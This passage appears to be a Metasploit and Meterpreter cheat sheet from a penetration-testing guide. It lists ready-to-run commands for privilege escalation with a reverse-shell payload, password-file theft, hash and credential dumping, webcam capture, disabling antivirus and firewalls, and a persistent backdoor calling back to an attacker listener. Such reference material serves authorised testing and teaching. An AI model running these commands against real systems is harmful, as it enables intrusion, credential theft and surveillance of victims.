-
msf > sessions [options or ID]: The sessions command allows you to list, interact with, and kill spawned sessions. The sessions can be shells, Meterpreter sessions, VNCs, and so on (use sessions -h to get help).
-
meterpreter > background: This will send the current Meterpreter session to the background and return you to the msf prompt.
- meterpreter > getuid: Displays to the user whether the Meterpreter server is running on the host.
- meterpreter > sysinfo: Displays the victim's OS info.
- meterpreter > cd: Changes the current directory on the compromised system.
- meterpreter > ls: Lists the current directory's contents.
- meterpreter > pwd: Prints the current directory on the compromised system.
- meterpreter > ps: Displays a list of running processes on the target.
- meterpreter > run post/windows/manage/migrate: Migrates to another process on the victim.
- meterpreter > use priv: Use this command before executing the getsystem command.
- meterpreter > getsystem: Use this command to elevate your privileges.
If you get the error priv_elevate_getsystem: Operation failed: Access is denied, then follow these steps:
meterpreter > background
Option 1:
msf > use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > show options
msf post(local_exploit_suggester) > run
Option 2:
- msf > use exploit/windows/local/: List of all Windows exploits.
- msf > use exploit/windows/local/ms10_015_kitrap0d: We've chosen one exploit from the list, as follows:
msf exploit(ms10_015_kitrap0d) > show options
msf exploit(ms10_015_kitrap0d) > set SESSION 1
msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.1.100
msf exploit(ms10_015_kitrap0d) > set LPORT 4445
msf exploit(ms10_015_kitrap0d) > exploit
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM - Hooray
- meterpreter > search: Provides a way of locating specific files on the target host. For example, search -f passwords*.txt.
- meterpreter > cat [file name path]: Displays the content of a file when it's given as an argument.
- meterpreter > download [file name path]: Downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path. For example, download C:\passwords.txt.
- meterpreter > upload [local file name] [remote path]: For example, upload evil_trojan.exe c:\windows\system32.
- meterpreter > execute [command]: Runs a command on the target system
- meterpreter > shell: Executes the shell (Terminal or DOS) on the target system.
- meterpreter > run post/windows/gather/hashdump: A post module that will dump the contents of the SAM database.
- meterpreter >ipconfig: Displays the network interfaces and addresses on the remote machine.
- meterpreter > webcam_list: Displays the currently available webcams on the target host.
- meterpreter > webcam_snap: Grabs a picture from a connected webcam on the target system and saves it to disc as a JPEG image. By default, the save location is the local current working directory with a randomized filename. For example, webcam_snap -i 1 -v false.
- meterpreter > python_import [local python file]: Imports a local Python file and executes it on the victim's machine. For example, meterpreter > python_import -f /root/readAutoLogonREG.py.
- meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24
- meterpreter > run post/windows/gather/checkvm: Checks to see if the compromised host is a virtual machine.
- meterpreter > run post/windows/gather/credentials/credential_collector: Harvests passwords hashes and tokens on the compromised host.
- meterpreter > run post/windows/gather/dumplinks: The dumplinks module parses the .lnk files in a user's recent documents, which could be useful for further information gathering.
- meterpreter > run post/windows/gather/enum_applications: Enumerates the applications that are installed on the compromised host.
- meterpreter > run post/windows/gather/enum_logged_on_users: Returns a list of current and recently logged on users, along with their SIDs.
- meterpreter > run post/windows/gather/enum_shares: Returns a list of both configured and recently used shares on the compromised system.
- meterpreter > run post/windows/gather/enum_snmp: Enumerates the SNMP service configuration on the target, if present, including the community strings.
- meterpreter > run post/windows/gather/hashdump: Dumps the local users' accounts on the compromised host using the registry.
- meterpreter > run post/windows/gather/usb_history: Enumerates the USB drive history on the compromised system.
- meterpreter > run getcountermeasure: Checks the security configuration on the victims' system and can disable other security measures, such as A/V, the firewall, and much more.
- meterpreter > run getgui -e: Enables RDP on a target system if it is disabled.
- meterpreter > run gettelnet -e: Enables Telnet on the victim if it is disabled.
- meterpreter > run killav: Disables most antivirus programs running as a service on a target.
- meterpreter > run remotewinenum -u administrator -p password123 -t 10.0.0.100: Enumerates the system information through wmic on the victim. Makes note of where the logs are stored.
- meterpreter > run scraper: Grabs the system information, including the entire registry
- meterpreter > run winenum: This makes for a very detailed Windows enumeration tool. It dumps tokens, hashes, and much more.
- meterpreter > run persistence -U -i 10 -p 443 -r 192.168.1.5: Configures our persistent Meterpreter session to wait until a user logs on to the remote system and tries to connect back to our listener every 10 seconds at IP address 192.168.1.5 on port 443.